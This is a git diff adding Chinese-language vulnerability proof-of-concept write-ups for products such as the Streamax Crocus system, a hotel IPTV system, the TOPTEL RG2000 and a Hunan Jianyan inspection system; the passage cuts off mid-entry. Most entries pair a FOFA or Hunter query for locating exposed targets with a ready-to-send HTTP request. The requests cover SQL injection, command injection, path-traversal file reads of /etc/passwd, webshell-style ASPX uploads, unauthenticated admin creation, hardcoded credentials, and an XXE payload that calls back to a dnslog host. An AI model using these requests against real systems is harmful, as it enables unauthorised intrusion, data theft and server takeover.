+Accept-Language: zh-CN,zh;q=0.9
+Connection: Keep-alive
+Content-Length: 135
+<?xml version="1.0" encoding="utf-8" ?><!DOCTYPE root [
+<!ENTITY rootas SYSTEM "http://dnslog">
+]>
+<xxx>
+&rootas;
+</xxx>
+
+```
diff --git a/深圳亮钻科技有限公司iDS联网数字标牌管理系统存在弱口令漏洞.md b/深圳亮钻科技有限公司iDS联网数字标牌管理系统存在弱口令漏洞.md
new file mode 100644
index 0000000..923a8ae
--- /dev/null
+++ b/深圳亮钻科技有限公司iDS联网数字标牌管理系统存在弱口令漏洞.md
@@ -0,0 +1,25 @@
+# 深圳亮钻科技有限公司iDS联网数字标牌管理系统存在弱口令漏洞
+
+# 一、漏洞简介
+深圳亮钻科技有限公司是一家专注于面对行业的嵌入式ARM板卡和主机解决方案的高新技术公司。亮钻科技集设计、研发、生产、销售及服务于一体，产品涉及嵌入式ARM板卡、嵌入式主机、通信模块等。深圳亮钻科技有限公司iDS联网数字标牌管理系统存在弱口令漏洞。
+
+# 二、影响版本
++ 深圳亮钻科技有限公司iDS联网数字标牌管理系统
+
+# 三、资产测绘
++ fofa `product="亮钻科技-iDS联网数字标牌管理系统"`
++ 特征
+
+![1709877666320-20578f7c-2164-46ae-a5d0-5015b33dd62b.png](./img/lacuycDSKiDmUgzN/1709877666320-20578f7c-2164-46ae-a5d0-5015b33dd62b-976768.png)
+
+# 四、漏洞复现
+```plain
+admin/admin
+```
+
+![1709877710390-c2fd4589-cc53-4a45-afa4-da5248b13270.png](./img/lacuycDSKiDmUgzN/1709877710390-c2fd4589-cc53-4a45-afa4-da5248b13270-425325.png)
+
+
+
+> 更新: 2024-03-13 23:54:14  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/zgvdqs8w7f6uaekw>
\ No newline at end of file
diff --git a/深圳市子辰视讯科技有限公司酒店智慧营销IPTV系统存在sql注入.md b/深圳市子辰视讯科技有限公司酒店智慧营销IPTV系统存在sql注入.md
new file mode 100644
index 0000000..d7db668
--- /dev/null
+++ b/深圳市子辰视讯科技有限公司酒店智慧营销IPTV系统存在sql注入.md
@@ -0,0 +1,51 @@
+# 深圳市子辰视讯科技有限公司酒店智慧营销IPTV系统存在sql注入
+
+# 一、漏洞简介
+深圳市子辰视讯科技有限公司酒店智慧营销IPTV系统存在sql注入。
+
+# 二、影响版本
++ 酒店智慧营销IPTV系统
+
+# 三、资产测绘
++ hunter`web.title:"登录 - 酒店智慧营销IPTV系统"`
++ 特征
+
+![1698932892581-a474c41f-686e-4883-b314-0993a114237b.png](./img/nuMvHSl80FyC2LGY/1698932892581-a474c41f-686e-4883-b314-0993a114237b-672455.png)
+
+# 四、漏洞复现
+漏洞位置：
+
+```plain
+/xsiptva/cniptv/userlogin.php
+```
+
+![1698932929487-4f3b4ae5-dfcf-47c5-b276-1d8ce2f24fb4.png](./img/nuMvHSl80FyC2LGY/1698932929487-4f3b4ae5-dfcf-47c5-b276-1d8ce2f24fb4-780511.png)
+
+登录界面存在sql注入，username参数sql注入漏洞
+
+```plain
+POST /xsiptva/cniptv/userlogin.php HTTP/1.1
+Host: xx.xx.xx.xx
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 29
+Origin: http://1.69.37.165:8880
+Connection: close
+Referer: http://1.69.37.165:8880/xsiptva/cniptv/userlogin.php
+Cookie: PHPSESSID=8kvgnj6bg3vr7ljf12c861s3i4
+Upgrade-Insecure-Requests: 1
+
+username=admin&password=admin
+```
+
+sqlmap
+
+![1698932982510-115d9e83-2ffa-4ee7-9f81-45fb28de0f62.png](./img/nuMvHSl80FyC2LGY/1698932982510-115d9e83-2ffa-4ee7-9f81-45fb28de0f62-596961.png)
+
+
+
+> 更新: 2024-02-29 23:55:47  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/bkkb8ze783s6xqap>
\ No newline at end of file
diff --git a/深圳市拓普泰尔科技有限公司RG2000存在命令执行漏洞.md b/深圳市拓普泰尔科技有限公司RG2000存在命令执行漏洞.md
new file mode 100644
index 0000000..82a17f2
--- /dev/null
+++ b/深圳市拓普泰尔科技有限公司RG2000存在命令执行漏洞.md
@@ -0,0 +1,44 @@
+# 深圳市拓普泰尔科技有限公司RG2000存在命令执行漏洞
+
+# 一、漏洞简介
+拓普泰尔是深圳市拓普泰尔科技有限公司，2018年10月28日在中国商标局注册成立的品牌，提供集成电路; 计算机硬件; 电传真设备; 芯片（集成电路）; 印刷电路板; 数据处理设备; 视频显示屏; 纤维光缆; 连接器（数据处理设备）; 集成电路卡等服务。深圳市拓普泰尔科技有限公司RG2000存在命令执行漏洞
+
+# 二、影响版本
++ RG2000
+
+# 三、资产测绘
+```http
+app="TOPTEL-RG2000"
+```
+
+![1722618708171-4d2e03b4-ee0b-4705-ad74-56a5b593643a.png](./img/7JxBmoSuzuvUDeWr/1722618708171-4d2e03b4-ee0b-4705-ad74-56a5b593643a-728808.png)
+
+# 四、漏洞复现
+```plain
+POST /cmdString.asp HTTP/1.1
+Host: 
+Content-Length: 90
+Accept: text/plain, */*; q=0.01
+X-Requested-With: XMLHttpRequest
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Origin: http://58.18.212.238:11180
+Referer: http://58.18.212.238:11180/index.html?rand=Nov-14-2022-18:11:039
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.9
+Cookie: language=0; user=admin; nonce=ffffffff015446cc0026259d; password=3d49ce727b199b6cdca0cf40c217b8d1
+Connection: close
+
+cmdString=rg_ping_diagnosis%0B%0D%09%0Acmd_diagnosis_dst_address%3D127.0.0.1%7Cls%0D%09%0A
+```
+
+admin/admin登录
+
+通信检测处ping命令和traceroute存在命令执行漏洞
+
+![1722620405428-275246cb-7a70-4bef-b880-d27a2161f073.png](./img/7JxBmoSuzuvUDeWr/1722620405428-275246cb-7a70-4bef-b880-d27a2161f073-669894.png)
+
+
+
+> 更新: 2024-08-12 17:48:53  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/hu8fngdtmgaf17yv>
\ No newline at end of file
diff --git a/深圳市朗驰欣创科技股份有限公司视频监控系统存在信息泄露漏洞.md b/深圳市朗驰欣创科技股份有限公司视频监控系统存在信息泄露漏洞.md
new file mode 100644
index 0000000..db9bc60
--- /dev/null
+++ b/深圳市朗驰欣创科技股份有限公司视频监控系统存在信息泄露漏洞.md
@@ -0,0 +1,36 @@
+# 深圳市朗驰欣创科技股份有限公司视频监控系统存在信息泄露漏洞
+
+# 一、漏洞简介
+ 深圳市朗驰欣创科技股份有限公司视频监控系统存在信息泄露漏洞，攻击者可通过该漏洞获取管理员账号密码。
+
+# 二、影响版本
+视频监控系统
+
+# 三、资产测绘
+```plain
+product="朗驰欣创-视频监控"
+```
+
+![1718871063209-09839cc3-6f98-4acc-93d6-58836915bbad.png](./img/IK3XpT3ZSooUYfXz/1718871063209-09839cc3-6f98-4acc-93d6-58836915bbad-621003.png)
+
+# 四、漏洞复现
+```java
+GET /content/network.asp HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate, br
+Connection: close
+Upgrade-Insecure-Requests: 1
+Priority: u=4
+```
+
+![1718871123998-a151d153-7d2f-45d6-be9a-2573d89cecd9.png](./img/IK3XpT3ZSooUYfXz/1718871123998-a151d153-7d2f-45d6-be9a-2573d89cecd9-223531.png)
+
+![1718871159744-6fb67d8c-22d4-4989-a227-8dad29c6d913.png](./img/IK3XpT3ZSooUYfXz/1718871159744-6fb67d8c-22d4-4989-a227-8dad29c6d913-922079.png)
+
+
+
+> 更新: 2024-06-23 23:42:48  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/yvu0uyqit8xy08u2>
\ No newline at end of file
diff --git a/深圳市锐明技术股份有限公司Crocus系统Service.do任意文件读取漏洞.md b/深圳市锐明技术股份有限公司Crocus系统Service.do任意文件读取漏洞.md
new file mode 100644
index 0000000..29f1858
--- /dev/null
+++ b/深圳市锐明技术股份有限公司Crocus系统Service.do任意文件读取漏洞.md
@@ -0,0 +1,32 @@
+# 深圳市锐明技术股份有限公司Crocus系统Service.do任意文件读取漏洞
+
+# 一、漏洞简介
+锐明技术作为一家专注于AI和视频技术的商用车智能物联（AIoT）解决方案提供商，Crocus系统是其核心产品之一。Crocus系统旨在利用人工智能、高清视频、大数据和自动驾驶技术，帮助商用车减少交通事故和货物丢失，提高企业或车队的运营效率。通过车载摄像头、毫米波雷达等传感器，实现对车辆周围环境的实时感知和监控，提高驾驶安全性。利用AI技术，系统能够识别车辆和行人的身份，并分析驾驶员的驾驶行为，及时提醒驾驶员注意潜在风险。Crocus系统能够实时监控货箱状态，包括货物是否丢失、货箱是否关闭等，并通过3D检测技术实现更精准的货物识别和管理。锐明技术Crocus系统 Service.do接口存在任意文件读取漏洞，未经过身份验证的远程攻击者可通过该漏洞读取系统重要文件（如数据库配置文件、系统配置文件）、数据库配置文件等等，导致网站处于极度不安全状态。
+
+# 二、影响版本
++ Crocus系统
+
+# 三、资产测绘
++ fofa`body="/ThirdResource/respond/respond.min.js" && title="Crocus"`
++ 特征
+
+![1720274332352-c9c6a280-a643-4bac-95f0-0f7942a72149.png](./img/5AiGbcw52EzAXtrg/1720274332352-c9c6a280-a643-4bac-95f0-0f7942a72149-759009.png)
+
+# 四、漏洞复现
+```http
+GET /Service.do?Action=Download&Path=C:/windows/win.ini HTTP/1.1
+Host: 
+Accept-Encoding:gzip,deflate,br
+Accept:*/*
+Accept-Language:en-US;q=0.9,en;q=0.8
+User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/124.0.6367.118Safari/537.36
+Connection:close
+Cache-Control:max-age=0
+```
+
+![1720274359372-2627708f-1f2b-442d-b494-cde20eb53e86.png](./img/5AiGbcw52EzAXtrg/1720274359372-2627708f-1f2b-442d-b494-cde20eb53e86-480553.png)
+
+
+
+> 更新: 2024-07-20 20:13:56  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/kgxxkp7cach713ge>
\ No newline at end of file
diff --git a/深圳市锐明技术股份有限公司Crocus系统存在任意用户添加漏洞.md b/深圳市锐明技术股份有限公司Crocus系统存在任意用户添加漏洞.md
new file mode 100644
index 0000000..53b2cb4
--- /dev/null
+++ b/深圳市锐明技术股份有限公司Crocus系统存在任意用户添加漏洞.md
@@ -0,0 +1,40 @@
+# 深圳市锐明技术股份有限公司Crocus系统存在任意用户添加漏洞
+
+# 一、漏洞简介
+锐明技术作为一家专注于AI和视频技术的商用车智能物联（AIoT）解决方案提供商，Crocus系统是其核心产品之一。Crocus系统旨在利用人工智能、高清视频、大数据和自动驾驶技术，帮助商用车减少交通事故和货物丢失，提高企业或车队的运营效率。通过车载摄像头、毫米波雷达等传感器，实现对车辆周围环境的实时感知和监控，提高驾驶安全性。利用AI技术，系统能够识别车辆和行人的身份，并分析驾驶员的驾驶行为，及时提醒驾驶员注意潜在风险。Crocus系统能够实时监控货箱状态，包括货物是否丢失、货箱是否关闭等，并通过3D检测技术实现更精准的货物识别和管理。深圳市锐明技术股份有限公司Crocus系统存在任意用户添加漏洞
+
+# 二、影响版本
++ Crocus系统
+
+# 三、资产测绘
++ fofa`body="/ThirdResource/respond/respond.min.js" && title="Crocus"`
++ 特征
+
+![1720274332352-c9c6a280-a643-4bac-95f0-0f7942a72149.png](./img/G83rnMK_DVPT5oUJ/1720274332352-c9c6a280-a643-4bac-95f0-0f7942a72149-345699.png)
+
+# 四、漏洞复现
+```http
+POST /RoleUser.do?Action=CreateUser HTTP/1.1
+Host: 
+X-Requested-With: XMLHttpRequest
+Token: d2Vic2VjOjE3MjQwNjk4NzE5NDk=
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Accept-Encoding: gzip, deflate
+Cookie: JSESSIONID=5420BDDEB39984240BE700F2E755F2F9; Saffron.U=VUlEPTImVU49d2Vic2VjJkdJRD0xNzI0MDY5ODcxOTQ5MSZSSUQ9MSZNPUJNYXAmSU5TPTE=
+Accept: application/json, text/javascript, */*; q=0.01
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
+Content-Length: 243
+
+UserID=&RoleID=1&DirName=%E6%A0%B9%E7%9B%AE%E5%BD%95&DirPower=1&GroupPower=1&GroupPowerName=crocus-center(81)&UserName=d2Jz&Password=ed5b11f0310676df5b25b140d8aab20e&ConfirmPassword=ed5b11f0310676df5b25b140d8aab20e&TelPhone=&Email=wbs%40qq.com
+```
+
+![1724151622084-63d6b6f3-0307-46dd-93b7-2d5a96cbec88.png](./img/G83rnMK_DVPT5oUJ/1724151622084-63d6b6f3-0307-46dd-93b7-2d5a96cbec88-504456.png)
+
+```http
+wbs/QWEqwe123登录
+```
+
+
+
+> 更新: 2024-09-06 02:24:17  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/kvyw6n7ou52f1ui6>
\ No newline at end of file
diff --git a/深圳市锐明技术股份有限公司Crocus系统存在敏感信息泄露漏洞.md b/深圳市锐明技术股份有限公司Crocus系统存在敏感信息泄露漏洞.md
new file mode 100644
index 0000000..4cb1d1b
--- /dev/null
+++ b/深圳市锐明技术股份有限公司Crocus系统存在敏感信息泄露漏洞.md
@@ -0,0 +1,33 @@
+# 深圳市锐明技术股份有限公司Crocus系统存在敏感信息泄露漏洞
+
+# 一、漏洞简介
+锐明技术作为一家专注于AI和视频技术的商用车智能物联（AIoT）解决方案提供商，Crocus系统是其核心产品之一。Crocus系统旨在利用人工智能、高清视频、大数据和自动驾驶技术，帮助商用车减少交通事故和货物丢失，提高企业或车队的运营效率。通过车载摄像头、毫米波雷达等传感器，实现对车辆周围环境的实时感知和监控，提高驾驶安全性。利用AI技术，系统能够识别车辆和行人的身份，并分析驾驶员的驾驶行为，及时提醒驾驶员注意潜在风险。Crocus系统能够实时监控货箱状态，包括货物是否丢失、货箱是否关闭等，并通过3D检测技术实现更精准的货物识别和管理。深圳市锐明技术股份有限公司Crocus系统存在敏感信息泄露漏洞
+
+# 二、影响版本
++ Crocus系统
+
+# 三、资产测绘
++ fofa`body="/ThirdResource/respond/respond.min.js" && title="Crocus"`
++ 特征
+
+![1720274332352-c9c6a280-a643-4bac-95f0-0f7942a72149.png](./img/UYZbMZVovOGNg0S7/1720274332352-c9c6a280-a643-4bac-95f0-0f7942a72149-943722.png)
+
+# 四、漏洞复现
+```http
+GET /Home.do?Action=GetUserInfo&Type=Get&Guid=1724206435273 HTTP/1.1
+Host: 
+Accept: */*
+Accept-Encoding: gzip, deflate
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
+Token: d2JzczoxNzI0MjA2NDIwNzU2
+Accept-Language: zh-CN,zh;q=0.9
+Cookie: JSESSIONID=234DBD0F52D9D798CB9931DEDA75131A; Saffron.U=VUlEPTEmVU49Y3JvY3VzJkdJRD0xNzI0MjA3NDQ5NTI2ODYmUklEPTEmTT1CTWFwJklOUz0x
+X-Requested-With: XMLHttpRequest
+```
+
+![1725460117888-1de7a21d-cdd9-49fc-99de-2248636c77d1.png](./img/UYZbMZVovOGNg0S7/1725460117888-1de7a21d-cdd9-49fc-99de-2248636c77d1-789831.png)
+
+
+
+> 更新: 2024-09-06 02:24:31  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/lr4dgs05xzsvh5l3>
\ No newline at end of file
diff --git a/深圳市锐明技术股份有限公司Crocus系统身份认证绕过漏洞.md b/深圳市锐明技术股份有限公司Crocus系统身份认证绕过漏洞.md
new file mode 100644
index 0000000..bb26dbd
--- /dev/null
+++ b/深圳市锐明技术股份有限公司Crocus系统身份认证绕过漏洞.md
@@ -0,0 +1,29 @@
+# 深圳市锐明技术股份有限公司Crocus系统身份认证绕过漏洞
+
+# 一、漏洞简介
+锐明技术作为一家专注于AI和视频技术的商用车智能物联（AIoT）解决方案提供商，Crocus系统是其核心产品之一。Crocus系统旨在利用人工智能、高清视频、大数据和自动驾驶技术，帮助商用车减少交通事故和货物丢失，提高企业或车队的运营效率。通过车载摄像头、毫米波雷达等传感器，实现对车辆周围环境的实时感知和监控，提高驾驶安全性。利用AI技术，系统能够识别车辆和行人的身份，并分析驾驶员的驾驶行为，及时提醒驾驶员注意潜在风险。Crocus系统能够实时监控货箱状态，包括货物是否丢失、货箱是否关闭等，并通过3D检测技术实现更精准的货物识别和管理。锐明技术Crocus系统 存在用户名密码硬编码漏洞，导致未授权的攻击者利用此漏洞绕过身份认证，直接接管后台，造成敏感信息泄露，且后台存在文件上传接口。深入利用可获取服务器权限，造成严重威胁。
+
+# 二、影响版本
++ Crocus系统
+
+# 三、资产测绘
++ fofa`body="/ThirdResource/respond/respond.min.js" && title="Crocus"`
++ 特征
+
+![1720274332352-c9c6a280-a643-4bac-95f0-0f7942a72149.png](./img/dFA2deStckjksa_r/1720274332352-c9c6a280-a643-4bac-95f0-0f7942a72149-431089.png)
+
+# 四、漏洞复现
+1. 输入用户名`streamax20020818`，密码任意抓包
+
+![1720275021075-379ccad6-0be7-4ea8-a6ca-21d87348d968.png](./img/dFA2deStckjksa_r/1720275021075-379ccad6-0be7-4ea8-a6ca-21d87348d968-194885.png)
+
+2. 将Passwd 修改为：`20020818streamax` 放包即可登录后台
+
+![1720275094141-21fef4c0-06eb-41f2-a4db-91054c8eb4d6.png](./img/dFA2deStckjksa_r/1720275094141-21fef4c0-06eb-41f2-a4db-91054c8eb4d6-825199.png)
+
+![1720275126656-84db2e9d-52aa-4365-b92e-91f1fc8fff01.png](./img/dFA2deStckjksa_r/1720275126656-84db2e9d-52aa-4365-b92e-91f1fc8fff01-500379.png)
+
+
+
+> 更新: 2024-07-06 22:12:09  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/xyb4kg8ahbop7p1h>
\ No newline at end of file
diff --git a/湖南建研-检测系统-admintool-任意文件上传.md b/湖南建研-检测系统-admintool-任意文件上传.md
new file mode 100644
index 0000000..72f0134
--- /dev/null
+++ b/湖南建研-检测系统-admintool-任意文件上传.md
@@ -0,0 +1,25 @@
+## 湖南建研-检测系统 admintool 任意文件上传
+
+
+## fofa
+```
+body="/Content/Theme/Standard/webSite/login.css"
+```
+
+## poc
+```
+POST /Scripts/admintool?type=updatefile HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
+Content-Length: 41
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Accept-Encoding: gzip, deflate, br
+
+filePath=dmvckiil.aspx&fileContent=123123
+```
+![7c62372ac4c93cda2a5dbc1ab4b5a986](https://github.com/wy876/POC/assets/139549762/c36d1b3f-f839-40c3-a6ab-23669a0b89dd)
+
+![940cc53a8930c36235859b455f3983ca](https://github.com/wy876/POC/assets/139549762/097b6b6f-1cde-4aad-96f7-7e70a0f6bbe0)
diff --git a/湖南建研工程质量检测系统Attachment存在任意文件上传漏洞.md b/湖南建研工程质量检测系统Attachment存在任意文件上传漏洞.md
new file mode 100644
index 0000000..6ce5374
--- /dev/null
+++ b/湖南建研工程质量检测系统Attachment存在任意文件上传漏洞.md
@@ -0,0 +1,66 @@
+# 湖南建研工程质量检测系统Attachment存在任意文件上传漏洞
+
+# 一、漏洞简介
+湖南建研质量监测系统由相关政府质量监督机构、参建单位等共同参与，根据各自的职责，上网操作相应的模块，实现工程质量监督业务的统一管理。该系统存在任意文件上传漏洞，攻击者可通过该漏洞获取服务器权限。
+
+# 二、影响版本
++ 湖南建研工程质量检测系统
+
+# 三、资产测绘
++ hunter`web.body="/Content/Theme/Standard/webSite/login.css"`
++ 特征
+
+![1702346060563-9e664378-c6d3-46b6-84b3-8d0043c714cd.png](./img/xVEDcUrG89WfIpu8/1702346060563-9e664378-c6d3-46b6-84b3-8d0043c714cd-920956.png)
+
+# 四、漏洞复现
+1. 上传txt文件
+
+```java
+POST /Applications/Attachment/upload.ashx HTTP/1.1
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+Content-Type: multipart/form-data; boundary=00content0boundary00
+Host: 
+Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
+Content-Length: 204
+Connection: close
+
+--00content0boundary00
+Content-Disposition: form-data; name="file"; filename="123.txt"
+
+12323344
+--00content0boundary00
+Content-Disposition: form-data; name="_upload_guid"
+
+123
+--00content0boundary00--
+
+```
+
+	![1714273613117-5394b2fc-d757-4f78-af67-28fe199a8804.png](./img/xVEDcUrG89WfIpu8/1714273613117-5394b2fc-d757-4f78-af67-28fe199a8804-531084.png)
+
+2. 将文件改名
+
+```java
+POST /Standard/Editor/API/File.cshtml?act=geturl HTTP/1.1
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+Host: 
+Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
+Content-type: application/x-www-form-urlencoded
+Content-Length: 59
+Connection: close
+
+filename=/tempData/stc.asp&filetplpath=/tempData/123.txt
+```
+
+![1714273657972-2fcea581-f80c-41be-a7d5-c01be5325229.png](./img/xVEDcUrG89WfIpu8/1714273657972-2fcea581-f80c-41be-a7d5-c01be5325229-807428.png)
+
+3. 文件上传位置
+
+```java
+/tempData/stc.asp
+```
+
+
+
+> 更新: 2024-04-28 11:08:22  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/vbwrh9veoyfo2yhb>
\ No newline at end of file
diff --git a/湖南建研工程质量检测系统FileUpload存在任意文件上传漏洞.md b/湖南建研工程质量检测系统FileUpload存在任意文件上传漏洞.md
new file mode 100644
index 0000000..8d05112
--- /dev/null
+++ b/湖南建研工程质量检测系统FileUpload存在任意文件上传漏洞.md
@@ -0,0 +1,50 @@
+# 湖南建研工程质量检测系统FileUpload存在任意文件上传漏洞
+
+# 一、漏洞简介
+湖南建研质量监测系统由相关政府质量监督机构、参建单位等共同参与，根据各自的职责，上网操作相应的模块，实现工程质量监督业务的统一管理。该系统存在任意文件上传漏洞，攻击者可通过该漏洞获取服务器权限。
+
+# 二、影响版本
++ 湖南建研工程质量检测系统
+
+# 三、资产测绘
++ hunter`web.body="/Content/Theme/Standard/webSite/login.css"`
++ 特征
+
+![1702346060563-9e664378-c6d3-46b6-84b3-8d0043c714cd.png](./img/IwfdowcgtbTh-STO/1702346060563-9e664378-c6d3-46b6-84b3-8d0043c714cd-785769.png)
+
+# 四、漏洞复现
+```plain
+POST /Platform/System/FileUpload.ashx HTTP/1.1
+Host: {hostname}
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+Connection: close
+Content-Length: 336
+Accept-Encoding: gzip
+Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l
+
+------YsOxWxSvj1KyZow1PTsh98fdu6l
+Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu63.asp"
+Content-Type: image/png
+
+123
+------YsOxWxSvj1KyZow1PTsh98fdu6l
+Content-Disposition: form-data; name="target"
+
+/Applications/SkillDevelopAndEHS/
+------YsOxWxSvj1KyZow1PTsh98fdu6l--
+```
+
+![1703507070360-9784a7d0-7511-4b04-81d2-07f780b073f8.png](./img/IwfdowcgtbTh-STO/1703507070360-9784a7d0-7511-4b04-81d2-07f780b073f8-646404.png)
+
+上传文件位置
+
+```plain
+/Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu63.asp
+```
+
+![1703507089398-37c89680-29c6-44ae-8fcf-a39b42416248.png](./img/IwfdowcgtbTh-STO/1703507089398-37c89680-29c6-44ae-8fcf-a39b42416248-473006.png)
+
+
+
+> 更新: 2024-02-29 23:55:43  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/hua2qyfh2eyq7raf>
\ No newline at end of file
diff --git a/湖南建研工程质量检测系统updatefile存在任意文件上传漏洞.md b/湖南建研工程质量检测系统updatefile存在任意文件上传漏洞.md
new file mode 100644
index 0000000..d1b97ed
--- /dev/null
+++ b/湖南建研工程质量检测系统updatefile存在任意文件上传漏洞.md
@@ -0,0 +1,43 @@
+# 湖南建研工程质量检测系统updatefile存在任意文件上传漏洞
+
+# 一、漏洞简介
+湖南建研质量监测系统由相关政府质量监督机构、参建单位等共同参与，根据各自的职责，上网操作相应的模块，实现工程质量监督业务的统一管理。该系统存在任意文件上传漏洞，攻击者可通过该漏洞获取服务器权限。
+
+# 二、影响版本
++ 湖南建研工程质量检测系统
+
+# 三、资产测绘
++ hunter`web.body="/Content/Theme/Standard/webSite/login.css"`
++ 特征
+
+![1702346060563-9e664378-c6d3-46b6-84b3-8d0043c714cd.png](./img/pyW4NN9yooREmsku/1702346060563-9e664378-c6d3-46b6-84b3-8d0043c714cd-565576.png)
+
+# 四、漏洞复现
+```plain
+POST /Scripts/admintool?type=updatefile HTTP/1.1
+Host: {hostname}
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:92.0) Gecko/20100101 Firefox/92.0
+Content-Length: 90
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Accept-Encoding: gzip, deflate
+
+filePath=enelxghy.aspx&fileContent=<%@ Page Language="C#"%><% Response.Write(1234*1234);%>
+```
+
+![1702348378974-0d318381-620c-41aa-b97a-1b4f19878845.png](./img/pyW4NN9yooREmsku/1702348378974-0d318381-620c-41aa-b97a-1b4f19878845-910772.png)
+
+上传文件位置
+
+```plain
+/Scripts/enelxghy.aspx
+```
+
+![1702348240471-b1fcadb7-dc80-40f8-8d01-7537daaeabb5.png](./img/pyW4NN9yooREmsku/1702348240471-b1fcadb7-dc80-40f8-8d01-7537daaeabb5-361653.png)
+
+
+
+> 更新: 2024-02-29 23:55:43  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/vltdwq5lzwibm1z7>
\ No newline at end of file
diff --git a/满客宝后台管理系统downloadWebFile任意文件读取漏洞.md b/满客宝后台管理系统downloadWebFile任意文件读取漏洞.md
new file mode 100644
index 0000000..fb7d73b
--- /dev/null
+++ b/满客宝后台管理系统downloadWebFile任意文件读取漏洞.md
@@ -0,0 +1,28 @@
+# 满客宝后台管理系统downloadWebFile任意文件读取漏洞
+
+# 一、漏洞简介
+满客宝后台管理系统downloadWebFile任意文件读取漏洞
+
+# 二、影响版本
++ 满客宝智慧食堂
+
+# 三、资产测绘
++ fofa`body="满客宝后台管理系统"`
++ 特征
+
+![1722532363550-337cb4d1-c45a-4dcf-a328-7b077525c2ef.png](./img/aKSqtnroQS-WMtFo/1722532363550-337cb4d1-c45a-4dcf-a328-7b077525c2ef-922609.png)
+
+# 四、漏洞复现
+```java
+GET /base/api/v1/kitchenVideo/downloadWebFile.swagger?fileName=&ossKey=/../../../../../../../../../../../etc/passwd HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
+Connection: close
+```
+
+![1722532515012-fbfcea9f-a5f9-4633-a9ce-f598bf620cec.png](./img/aKSqtnroQS-WMtFo/1722532515012-fbfcea9f-a5f9-4633-a9ce-f598bf620cec-890321.png)
+
+
+
+> 更新: 2024-08-12 17:15:58  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/brcqc05pkowbygvw>
\ No newline at end of file
diff --git a/满客宝智慧食堂预定系统selectUserByOrgId存在未授权访问漏洞.md b/满客宝智慧食堂预定系统selectUserByOrgId存在未授权访问漏洞.md
new file mode 100644
index 0000000..ca9f46d
--- /dev/null
+++ b/满客宝智慧食堂预定系统selectUserByOrgId存在未授权访问漏洞.md
@@ -0,0 +1,28 @@
+# 满客宝智慧食堂预定系统selectUserByOrgId 存在未授权访问漏洞
+
+# 一、漏洞简介
+满客宝智慧食堂预定系统selectUserByOrgId 存在未授权访问漏洞
+
+# 二、影响版本
++ 满客宝智慧食堂预定系统
+
+# 三、资产测绘
++ fofa`icon_hash="-409875651" `
++ 特征
+
